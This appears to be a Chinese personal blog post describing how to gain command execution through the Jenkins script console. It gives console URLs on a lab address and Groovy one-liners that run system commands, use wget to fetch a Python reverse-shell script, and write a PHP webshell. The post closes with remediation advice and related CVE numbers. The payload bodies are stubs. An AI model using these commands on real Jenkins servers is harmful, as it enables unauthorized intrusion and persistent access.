方糖的博客

安全小技巧

新的一年快到了….

剪刀石头布,哈,我又赢了

2023

05-16

永远新的开始啊

漏洞描述

默认情况下 Jenkins 面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进脚本执行界面从而获取服务器权限。

漏洞利用

命令执行地址

http://192.168.56.114:8080/script

http://192.168.56.114:8080/manage

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
命令执行
println "ifconfig -a".execute().text 执行ifconfig 命令
println "wget http://127.0.0.1/1.py".execute().text 下载py文件反弹shell

写文件shell
new File("/tmp/1.py").write("""
1
2
3
"""); 使用命令写入文件1.py 随后执行命令反弹

写websehll 文件
new File("/var/www/html/1.php").write("""
1
2
3
""");

修复建议

  • 禁止 jenkins 暴露在公网
  • 添加认证,设置复杂密码以及账号锁定

相关CVE

CVE-2017-1000353

CVE-2018-1000861

啊,再见了,再见了,哈

我们会再见的对么

再见你要幸福

燕子,燕子